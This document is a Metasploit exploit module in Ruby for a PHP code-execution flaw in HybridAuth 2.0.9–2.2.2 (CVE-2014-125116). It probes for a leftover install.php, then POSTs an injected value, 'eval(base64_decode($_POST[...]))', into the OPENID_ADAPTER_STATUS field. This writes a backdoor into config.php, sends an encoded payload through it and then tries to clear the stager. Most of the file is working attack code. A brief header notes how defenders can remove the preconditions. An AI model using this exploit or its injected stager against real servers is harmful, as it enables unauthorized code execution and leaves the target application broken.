##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
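# Exploit module for the HybridAuth install.php PHP code execution issue
# (CVE-2014-125116, EDB 34273). The leftover installer writes attacker-
# controlled text into config.php; the module uses that to run a PHP payload.
#
# From a defender's perspective the two conditions this module needs are the
# ones the check method tests for: install.php still present after install,
# and config.php writable by the web server. Removing the installer and
# making config.php read-only removes both.
class MetasploitModule < Msf::Exploit::Remote
  # Manual ranking: a successful run overwrites config.php and leaves the
  # application unusable, so the operator must opt in explicitly.
  Rank = ManualRanking # application config.php is overwritten

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata, references and the TARGETURI option.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HybridAuth install.php PHP Code Execution',
        'Description' => %q{
          This module exploits a PHP code execution vulnerability in
          HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
          is not removed after installation allowing unauthenticated users to
          write PHP code to the application configuration file 'config.php'.

          Note: This exploit will overwrite the application configuration file
          rendering the application unusable.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Pichaya Morimoto', # Discovery and PoC
          'bcoles' # Metasploit
        ],
        'References' => [
          ['CVE', '2014-125116'],
          ['EDB', '34273'],
          ['OSVDB', '109838']
        ],
        'Arch' => ARCH_PHP,
        'Platform' => 'php',
        'Targets' => [
          # Tested:
          # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
          ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2014-08-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
      ]
    )
  end

  #
  # Check:
  # * install.php exists
  # * config.php is writable
  # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
  #
  # @return [Exploit::CheckCode] Unknown when no response is received,
  #   Vulnerable when the installer page is reachable, reports no
  #   unwritable file and shows an affected version, Safe otherwise.
  def check
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
    if !res
      vprint_error "Connection failed"
      return Exploit::CheckCode::Unknown
    elsif res.code == 404
      # Installer already removed: the condition the module depends on is absent.
      vprint_error "Could not find install.php"
    elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
      # The installer page names the file it cannot write; report that name.
      vprint_error "#{Regexp.last_match(1)} is not writable"
    elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
      version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
      vprint_status "Found version: #{version}"
      if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
        return Exploit::CheckCode::Vulnerable
      else
        vprint_error "HybridAuth version #{version} is not vulnerable"
      end
    end
    Exploit::CheckCode::Safe
  end

  #
  # Exploit
  #
  # Three HTTP exchanges, all against TARGETURI: (1) POST to install.php so
  # the installer writes a stager into config.php, (2) POST the encoded
  # payload to config.php, (3) POST to install.php again to clear the stager.
  # Each step fails loudly via fail_with except the last, which only warns.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the target is not
  #   vulnerable, the connection fails, or the stager cannot be written
  def exploit
    # check vuln
    if check != Exploit::CheckCode::Vulnerable
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
    end

    # write backdoor
    print_status "Writing backdoor to config.php"
    # Random numeric POST key so the stager's parameter name is not fixed.
    payload_param = rand(1000)
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'install.php'),
      'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
    )
    if !res
      fail_with Failure::Unknown, "#{peer} - Connection failed"
    elsif res.body =~ /Installation completed/
      print_good "Wrote backdoor successfully"
    else
      fail_with Failure::UnexpectedReply, "#{peer} - Could not write backdoor to 'config.php'"
    end

    # execute payload
    code = Rex::Text.encode_base64(payload.encoded)
    print_status "Sending payload to config.php backdoor (#{code.length} bytes)"
    # Second argument is a short timeout: the payload request may never
    # return normally, so a missing response is treated as a warning below.
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'config.php'),
      'data' => "#{payload_param}=#{code}"
    }, 5)
    if !res
      print_warning "No response"
    elsif res.code == 404
      fail_with Failure::NotFound, "#{peer} - Could not find config.php"
    elsif res.code == 200 || res.code == 500
      # 500 is accepted as success: presumably the page errors after the
      # injected code has already run — TODO confirm against a live target
      print_good "Sent payload successfully"
    end

    # remove backdoor
    print_status "Removing backdoor from config.php"
    # Empty value rewrites config.php without the stager; config.php stays
    # overwritten, which is why the module is ManualRanking.
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'install.php'),
      'data' => 'OPENID_ADAPTER_STATUS='
    )
    if !res
      print_error "Connection failed"
    elsif res.body =~ /Installation completed/
      print_good "Removed backdoor successfully"
    else
      print_warning "Could not remove payload from config.php"
    end
  end
end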